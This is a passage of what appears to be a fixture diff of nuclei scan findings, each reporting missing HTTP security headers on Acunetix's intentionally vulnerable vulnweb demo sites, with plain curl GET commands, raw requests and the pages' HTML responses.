"http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:40:58.946Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 387, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:40:59.082Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 388, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:59.209Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 389, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:59.335Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 390, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:40:59.464Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 391, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:40:59.600Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 392, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:40:59.729Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. 